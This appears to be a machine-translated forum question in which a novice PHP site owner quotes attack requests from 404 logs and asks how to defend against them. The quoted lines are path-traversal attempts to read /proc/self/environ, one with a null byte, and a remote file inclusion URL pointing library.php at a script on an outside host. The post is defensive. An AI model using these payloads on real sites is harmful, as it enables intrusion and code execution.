Melihat melalui 404 log saya, saya perhatikan dua URL berikut, yang keduanya terjadi sekali:
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ
dan
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00
Halaman yang dimaksud,, library.php
membutuhkan type
variabel dengan setengah lusin nilai yang dapat diterima berbeda, dan kemudian id
variabel. Jadi mungkin URL yang valid
library.php?type=Circle-K&id=Strange-Things-Are-Afoot
dan id semua dijalankan mysql_real_escape_string
sebelum digunakan untuk query database.
Saya pemula, tetapi menurut saya kedua tautan ini adalah serangan sederhana terhadap webroot?
1) Bagaimana cara terbaik untuk melindungi hal-hal semacam ini selain 404?
2) Haruskah saya mengizinkan IP yang bertanggung jawab?
EDIT: juga baru saja memperhatikan yang satu ini
/library.php=http://www.basfalt.no/scripts/danger.txt
EDIT 2: IP yang menyinggung untuk semua 3 serangan adalah 216.97.231.15
yang melacak ke ISP disebut Lunar Pages yang terletak di luar Los Angeles.
EDIT 3: Saya telah memutuskan untuk menelepon ISP Jumat pagi waktu setempat dan mendiskusikan masalah ini dengan siapa pun yang dapat saya telepon. Saya akan memposting hasilnya di sini dalam 24 jam atau lebih.
EDIT 4: Saya akhirnya mengirim email ke admin mereka dan mereka menjawab pertama bahwa "mereka sedang mencari ke dalamnya" dan kemudian sehari kemudian dengan "masalah ini harus diselesaikan sekarang." Sayangnya, tidak ada perincian lebih lanjut.
type
memberitahu script yang meliputi penggunaan (meskipun melalui IF $_GET['type'] == 'thing') {} ESLE...
, bukan sebagai link langsung seperti include 'type.php'
) dan id
dijalankan melalui mysql_real_escape_string dan yang digunakan untuk query. Mengetahui hal itu, apakah saya masih aman?